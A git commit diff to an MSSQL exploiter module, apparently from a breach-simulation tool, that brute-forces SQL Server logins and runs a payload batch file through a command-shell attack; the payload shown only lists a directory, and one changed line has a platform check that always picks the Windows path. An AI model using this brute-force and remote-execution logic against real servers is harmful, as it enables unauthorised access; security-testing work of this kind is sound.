- Updated dynamic payload file creation
This commit is contained in:
parent
dfe6cf073e
commit
9e0fbdaac3
|
@ -1,3 +1,5 @@
|
|||
import os
|
||||
import platform
|
||||
from os import path
|
||||
import logging
|
||||
|
||||
|
@ -15,15 +17,14 @@ class MSSQLExploiter(HostExploiter):
|
|||
_TARGET_OS_TYPE = ['windows']
|
||||
LOGIN_TIMEOUT = 15
|
||||
SQL_DEFAULT_TCP_PORT = '1433'
|
||||
DEFAULT_PAYLOAD_PATH = path.abspath(r'.monkey_utils\payloads\mssqlexec_payload.bat')
|
||||
DEFAULT_PAYLOAD_PATH = os.path.expandvars(r'%TEMP%\~PLD123.bat') if platform.system() else '/tmp/~PLD123.bat'
|
||||
|
||||
def __init__(self, host):
|
||||
super(MSSQLExploiter, self).__init__(host)
|
||||
self._config = __import__('config').WormConfiguration
|
||||
self.attacks_list = [mssqlexec_utils.CmdShellAttack]
|
||||
|
||||
@staticmethod
|
||||
def create_payload_file(payload_path=DEFAULT_PAYLOAD_PATH):
|
||||
def create_payload_file(self, payload_path=DEFAULT_PAYLOAD_PATH):
|
||||
"""
|
||||
This function creates dynamically the payload file to be transported and ran on the exploited machine.
|
||||
:param payload_path: A path to the create the payload file in
|
||||
|
@ -34,7 +35,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
payload_file.write('dir C:\\')
|
||||
return True
|
||||
except Exception as e:
|
||||
LOG.error("Payload file couldn't be created", exec_info=True)
|
||||
LOG.error("Payload file couldn't be created", exc_info=True)
|
||||
return False
|
||||
|
||||
def exploit_host(self):
|
||||
|
@ -45,7 +46,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
"""
|
||||
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
|
||||
|
||||
if not MSSQLExploiter.create_payload_file():
|
||||
if not self.create_payload_file():
|
||||
return False
|
||||
if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list,
|
||||
self.DEFAULT_PAYLOAD_PATH):
|
||||
|
|
Loading…
Reference in New Issue